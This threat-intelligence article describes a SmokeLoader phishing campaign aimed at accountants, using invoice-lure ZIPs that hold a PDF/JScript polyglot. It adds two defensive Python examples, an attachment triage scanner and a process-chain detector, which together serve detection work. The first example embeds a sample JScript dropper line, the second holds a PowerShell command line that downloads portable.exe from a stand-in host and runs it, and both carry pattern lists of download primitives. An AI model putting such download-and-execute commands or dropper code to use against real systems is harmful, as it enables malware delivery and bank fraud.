
Phishing Campaign Distributes SmokeLoader via Fake Invoice

An ongoing phishing campaign identified by CERT-UA abuses compromised email accounts to send phishing emails with invoice lures. The main targets are the computers used by financial accountants; the attackers aim to gain remote access to banking systems by deploying the SmokeLoader malware.

A financially motivated campaign

The alert warns that the attackers send spam emails with the subject “bill/payments” and a ZIP archive attached.
  • The attacks have been attributed to the financially motivated UAC-0006 group, which has been active since at least 2013.
  • The attackers attempt to steal authentication material such as credentials, keys, or certificates, and then use it to create unauthorized financial transactions to accounts under their control.
  • The attached ZIP archive contains a polyglot file, that is, a single file that can be interpreted as more than one file format. Here it combines a decoy document with a JavaScript file.
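
The triage a mail gateway or analyst would want for such an attachment, as an added example that is not part of the CERT-UA alert or of this article: open the ZIP, and flag members that carry a Windows Script Host extension, an irregular or masked double extension (the alert's file name has two dots before ".js"), or a document header with script tokens behind it, which is how a decoy-plus-script polyglot tends to look. The sample archive, its decoy PDF, the exact JScript contents and the script-marker list are constructed assumptions for the demonstration, not artefacts from the campaign.

```python
"""Triage a mail-attachment ZIP for script-host payloads and document/script polyglots."""
import io
import zipfile
from typing import Dict, List

# Extensions handed to Windows Script Host, cmd.exe or PowerShell on double-click.
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "cmd", "bat", "ps1"}
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt"}
# Leading bytes of common document containers.
DOC_MAGIC = {b"%PDF-": "pdf", b"\xd0\xcf\x11\xe0": "ole2", b"PK\x03\x04": "ooxml/zip", b"{\\rtf": "rtf"}
# Tokens a JScript dropper usually carries (heuristic; an assumption of this example).
SCRIPT_MARKERS = (b"ActiveXObject", b"WScript", b"powershell", b"eval(")


def member_findings(name: str, data: bytes) -> List[str]:
    """Return the reasons one archive member looks like a script-host lure (empty if none)."""
    findings: List[str] = []
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext in SCRIPT_EXTS:
        findings.append(f"script-host extension .{ext}")
        if ".." in base:
            findings.append("irregular double dot in name")
        if len(parts) >= 3 and parts[-2] in DOC_EXTS:
            findings.append(f"document extension .{parts[-2]} masked by .{ext}")
    # A file that opens as a document yet contains script tokens is a polyglot candidate.
    doc_kind = next((kind for magic, kind in DOC_MAGIC.items() if data.startswith(magic)), None)
    if doc_kind and any(token in data for token in SCRIPT_MARKERS):
        findings.append(f"{doc_kind} header with script markers inside (possible polyglot)")
    return findings


def triage_zip(zip_bytes: bytes) -> Dict[str, List[str]]:
    """Map each suspicious member name to its findings; clean members are omitted."""
    report: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Read at most 1 MiB per member so a decompression bomb cannot exhaust memory.
            with zf.open(info) as fh:
                data = fh.read(1 << 20)
            findings = member_findings(info.filename, data)
            if findings:
                report[info.filename] = findings
    return report


def build_sample_zip() -> bytes:
    """Constructed lure: a harmless decoy PDF plus a JScript member prefixed with that PDF."""
    decoy = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"
    dropper = decoy + b"\nvar sh = new ActiveXObject('WScript.Shell');\nsh.Run('powershell -w hidden -c Get-Date', 0);\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_2023.pdf", decoy)
        zf.writestr("pax_2023_AB1058..js", dropper)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_zip(build_sample_zip()).items():
        print(member)
        for reason in reasons:
            print("  -", reason)
```

The extension check is deliberately done on the last dot only, because that is what the shell uses to pick the handler; the separate double-dot and masked-extension findings exist so an analyst sees why an otherwise ordinary ".js" name was crafted that way. The magic-plus-markers heuristic will also fire on legitimate Office files that embed scripts, so treat it as a triage signal, not a verdict.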

Digging deeper into the polyglot file

  • The polyglot file, named pax_2023_AB1058..js, uses PowerShell to download and run further payloads. Specifically, it fetches an executable called portable.exe which, when run, launches the SmokeLoader malware.
  • The compilation date of the file and the registration date of the domain involved indicate that the campaign began in April 2023.
  • Once running, SmokeLoader injects malicious code into running processes and downloads additional payloads.
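
The execution chain above (script host, then PowerShell, then a downloaded binary) is what endpoint telemetry sees, so the following added example, which is not from the CERT-UA alert or this article, runs three correlation rules over Sysmon-style process-creation events: a script host launched from a user temp or download path, PowerShell whose parent is wscript.exe or cscript.exe (raised to high when the command line carries a download primitive), and any other binary started by a PowerShell that itself descends from a script host. The event records, process IDs, paths, the example.invalid URL and the temp-path heuristic are constructed assumptions for the demonstration.

```python
"""Correlate script host -> PowerShell -> dropped binary in process-creation events."""
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# PowerShell primitives commonly used to fetch a second stage.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|invoke-restmethod|\birm\b|curl\.exe|certutil",
    re.IGNORECASE,
)
# Where an archive member opened straight from a mail client usually lands (assumption).
USER_TEMP_RE = re.compile(r"\\appdata\\local\\temp\\|\\downloads\\", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(event: Dict, by_pid: Dict[int, Dict]) -> List[Dict]:
    """Parent chain of an event, nearest parent first; stops at a missing or cyclic pid."""
    chain: List[Dict] = []
    seen = {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        chain.append(cur)
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])
    return chain


def alert(event: Dict, severity: str, reason: str) -> Dict:
    return {"pid": event["pid"], "image": image_name(event["image"]), "severity": severity, "reason": reason}


def detect_chain(events: List[Dict]) -> List[Dict]:
    """Apply the three rules to a batch of events (pid, ppid, image, cmdline) and return alerts."""
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Dict] = []
    for e in events:
        img = image_name(e["image"])
        parents = [image_name(p["image"]) for p in ancestors(e, by_pid)]
        if img in SCRIPT_HOSTS and USER_TEMP_RE.search(e["cmdline"]):
            alerts.append(alert(e, "low", "script host running a script from a user temp/download path"))
        elif img in SHELLS and parents and parents[0] in SCRIPT_HOSTS:
            if DOWNLOAD_RE.search(e["cmdline"]):
                alerts.append(alert(e, "high", "PowerShell spawned by Windows Script Host with a download primitive"))
            else:
                alerts.append(alert(e, "medium", "PowerShell spawned by Windows Script Host"))
        elif img not in SHELLS | SCRIPT_HOSTS and parents and parents[0] in SHELLS \
                and any(p in SCRIPT_HOSTS for p in parents[1:]):
            alerts.append(alert(e, "high", "binary executed by PowerShell that descends from a script host"))
    return alerts


# Constructed sample telemetry: one infection chain plus two benign events that must stay quiet.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\acct\AppData\Local\Temp\Temp1_bill.zip\pax_2023_AB1058..js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/portable.exe','C:\Users\acct\AppData\Local\Temp\portable.exe'); Start-Process 'C:\Users\acct\AppData\Local\Temp\portable.exe'"'''},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\acct\AppData\Local\Temp\portable.exe", "cmdline": "portable.exe"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\dc01\netlogon\map_drives.vbs"},
]

if __name__ == "__main__":
    for a in detect_chain(SAMPLE_EVENTS):
        print(f"[{a['severity']}] pid={a['pid']} {a['image']}: {a['reason']}")
```

The third rule walks the full ancestry rather than checking only the direct parent, so the dropped binary is still caught when the loader inserts cmd.exe or a second PowerShell between the script host and the payload. The low-severity path rule is the noisiest of the three and is there to give an analyst the originating script, not to page anyone on its own.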

What to do?

CERT-UA has suggested that JavaScript loaders, which are typically used at the initial stage of the attack, can be blocked by restricting the launch of Windows Script Host (wscript.exe) on the PC. Note that cscript.exe is the second script host and runs the same files; disabling Windows Script Host through the Enabled value under HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings covers both, as does an application-control rule for the two binaries. Additionally, CERT-UA has provided the relevant indicators of compromise (IoCs), which can be used to block the SmokeLoader-related files and infrastructure at the network boundary.
Cyware Publisher